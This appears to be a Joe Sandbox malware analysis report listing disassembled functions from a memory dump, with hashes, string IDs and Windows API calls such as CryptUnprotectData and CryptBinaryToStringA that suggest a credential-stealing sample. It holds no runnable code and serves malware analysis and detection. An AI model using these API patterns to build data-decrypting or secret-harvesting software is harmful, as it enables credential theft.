                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 5c2839adda6ad438ff7af8ccf9cb0a73c14e7c8ab41628e375a2ff1f40376d2a
                            • Instruction ID: b94e17f31198a08b4271b9a58e73e7717716003c8dfa735a6eb3b37cdfa3da3b
                            • Opcode Fuzzy Hash: 5c2839adda6ad438ff7af8ccf9cb0a73c14e7c8ab41628e375a2ff1f40376d2a
                            • Instruction Fuzzy Hash: 9D63837369EBD41ECB27CB30A7B61517F26FA1335071869CEC4C1AB4B3C6809A16E356
                            Function 012AD731 Relevance: 7.3, Strings: 5, Instructions: 1047COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: [JM7$[JM7$l$]$p$]$*?{
                            • API String ID: 0-2911320789
                            • Opcode ID: 0f9710b23c7984020d89ad6c53319d9de3603299a62b87d317d798ec0333cc9d
                            • Instruction ID: b0464103a2aa44807ee229185b0ccbc3cb9440b6f3f6dacf1da123885a27cb50
                            • Opcode Fuzzy Hash: 0f9710b23c7984020d89ad6c53319d9de3603299a62b87d317d798ec0333cc9d
                            • Instruction Fuzzy Hash: 7262F6F360C2009FE3086E29EC8567AFBE5EF94720F16893DE6C5C3744EA3598418697
                            Function 012A32F3 Relevance: 6.6, Strings: 4, Instructions: 1584COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: oU/$l^g$nr$@c
                            • API String ID: 0-471548969
                            • Opcode ID: 0283c41b788418f027c2907b1bfdf4367f655d4ce23bf743530d3c4df9240dc7
                            • Instruction ID: 0af42080f21a7f9756e479a9355271fcb79c7f7ac477b87d9706e56c2ef48ac7
                            • Opcode Fuzzy Hash: 0283c41b788418f027c2907b1bfdf4367f655d4ce23bf743530d3c4df9240dc7
                            • Instruction Fuzzy Hash: A3B2E7F3A0C6109FE304AE2DEC8567AFBE5EF94760F16892DE6C4C3744E63598018796
                            Function 012A196D Relevance: 6.6, Strings: 4, Instructions: 1555COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :Gn$A+;w$rOm$\{
                            • API String ID: 0-4170739284
                            • Opcode ID: 41e5e554d62900cf9c47315056d9a0f8b64a6d6f4d98e6dd33ac4a8a344b4f8c
                            • Instruction ID: a0ae427dab0e573e653108de8ccea8d29b5496ac68ac6dacdac872eacb11e56b
                            • Opcode Fuzzy Hash: 41e5e554d62900cf9c47315056d9a0f8b64a6d6f4d98e6dd33ac4a8a344b4f8c
                            • Instruction Fuzzy Hash: BEA215F360C2049FE704AE2DEC8567ABBE5EFD4720F16893DEAC483744EA3558058697
                            Function 0129FF25 Relevance: 6.6, Strings: 4, Instructions: 1553COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: - $XtI$ZtL$+6k
                            • API String ID: 0-2321713521
                            • Opcode ID: 1f0f4215a9a07b779312d6c29b097221df78df397bf33dab0178f16bdeaa855c
                            • Instruction ID: 020e9969976f5e47865006d03ddb4852351fcc714e4eaf872a9e1883428e4277
                            • Opcode Fuzzy Hash: 1f0f4215a9a07b779312d6c29b097221df78df397bf33dab0178f16bdeaa855c
                            • Instruction Fuzzy Hash: 9FB2F7F3A0C2009FE704AE29DC8566AFBE9EFD4720F1A893DE6C4C7744E67558058693
                            Function 012A4CC6 Relevance: 6.5, Strings: 4, Instructions: 1547COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: MQ>$>w$U}_$:}
                            • API String ID: 0-2290953874
                            • Opcode ID: 4b6f930aab4e35715cbdbe4e740b21bc762582ab594fb648458d830239babd2a
                            • Instruction ID: 472c6b49a421ab86d7bf869fde51d5c08bc60c32026af154c44cc4d9369387a1
                            • Opcode Fuzzy Hash: 4b6f930aab4e35715cbdbe4e740b21bc762582ab594fb648458d830239babd2a
                            • Instruction Fuzzy Hash: 0CB2A6F260C200AFE304AF29DC85A7AF7E9EF98720F16893DE6C583744E63558458797
                            Function 012A8588 Relevance: 6.3, Strings: 4, Instructions: 1296COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: J[o$qZo}$"|>$2j5
                            • API String ID: 0-1495194624
                            • Opcode ID: d60c0bc2666fed20d8be952c8f56a3a2e3de4e84bda156318db8c994ceeb655a
                            • Instruction ID: fdfa694f3b2355f01ce88b909f02a7bd96e65028f0fc1792926e322f6d80b79f
                            • Opcode Fuzzy Hash: d60c0bc2666fed20d8be952c8f56a3a2e3de4e84bda156318db8c994ceeb655a
                            • Instruction Fuzzy Hash: A6823AF3A0C2049FE3046E2DEC8567AB7E5EF94720F1A453DEAC5C7740E93598058697
                            Function 00E59030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00E451D4,40000001,00000000,00000000,?,00E451D4), ref: 00E59050
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 27d70ddd265a611d2dc4ae3312c39740b9c8ce69f768c0f2a2387eb9f31c6c5f
                            • Instruction ID: 671bdc2347fd4aafb8c8f5670ea405b65edb5795e4fad2e30432ba3da4ef0c52
                            • Opcode Fuzzy Hash: 27d70ddd265a611d2dc4ae3312c39740b9c8ce69f768c0f2a2387eb9f31c6c5f
                            • Instruction Fuzzy Hash: 3C110A74200204FFDF14CF54D894FEA73A9AF89315F109858FD199B381D775E9458B60
                            Function 00E57BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009CEAE8,00000000,?,00E60DF8,00000000,?,00000000,00000000), ref: 00E57BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009CEAE8,00000000,?,00E60DF8,00000000,?,00000000,00000000,?), ref: 00E57C0D
                            • wsprintfA.USER32 ref: 00E57C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 155199656ae90616f1b4dc389bc0da2340e65d0b137892977f7dffee1842fa35
                            • Instruction ID: 0fb519bfe38a375b4cf8d0a212baa4304b8bf0081436267e501d612b32535fa6
                            • Opcode Fuzzy Hash: 155199656ae90616f1b4dc389bc0da2340e65d0b137892977f7dffee1842fa35
                            • Instruction Fuzzy Hash: 7F11A1B1945218EBEB248B54DD45FA9F778FB44711F1007E9FA1AA33C0DB741A848B51
                            Function 00E53970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(00E5E120,00000000,00000001,00E5E110,00000000), ref: 00E539A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E53A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 1a5e43c5190f0d24457a5bb972114ef8ff56317c66cbd9738a1461c9ea48d51d
                            • Instruction ID: 495df29584087b9ad2e8ac784b98ff37a6bce89c765d6a8e048ac2d4ccb198cb
                            • Opcode Fuzzy Hash: 1a5e43c5190f0d24457a5bb972114ef8ff56317c66cbd9738a1461c9ea48d51d
                            • Instruction Fuzzy Hash: F9411670A00A289FDB24DB58CC95B9BB7B5AB48302F4055D8E608E72D0D7B16EC5CF50
                            Function 00E4A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E4A2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E4A2F3
                            • LocalFree.KERNEL32(?), ref: 00E4A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 40716fce252eebe0c7c34870a54e57f1e44be2f513cb70ff361c3b72c9fcb296
                            • Instruction ID: ecbc7da3cca4c160c4d9b0f1cd533e24640441ddd3ad938d150d3428199c5974
                            • Opcode Fuzzy Hash: 40716fce252eebe0c7c34870a54e57f1e44be2f513cb70ff361c3b72c9fcb296
                            • Instruction Fuzzy Hash: 2711A8B4A00209DFCB04DFA4D985AAEB7B5FB89300F108569FD15A7394D730AE51CB61
                            Function 012AEB33 Relevance: 4.2, Strings: 2, Instructions: 1652COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
